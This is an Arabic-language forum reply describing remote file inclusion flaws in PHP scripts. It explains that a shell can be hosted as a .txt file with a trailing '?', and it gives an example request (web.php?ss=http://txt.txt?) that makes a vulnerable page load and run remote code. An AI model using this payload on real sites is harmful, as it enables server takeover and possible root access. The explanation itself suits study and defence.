تشكر اخوي على الشرح الرائع فعلا
ولكنك نسيت الاخطر و الاشهر file include ثغرات فايل انكلود التي من خلالها تمكن من رفع الملفات على موقعك
وخاصه رفع الشلات txt واحد يقول وما الخطورة فيtxt اقول وببساطه وضع علامة الاستفهام في اخرة ؟
ويكون قد رفع صفحه php من برمجته و يتحكم بالموقع حسب حماية السيرفر وقد ياخذ root بسببها
ويقةم الاستغلال كتالي
مثلا عندي صفحه باحد السكربات وليكن اسمها web.php
تحتوي على ثغرة فايل انكلود وهذا المتغير قد يكون ss
فيستخدم هكذا
web.php?ss=http://txt.txt?
فيتم رفع الصفحه php و الدخول على السيرفر والباقي فقط يعتمد على حماية السيرفر
|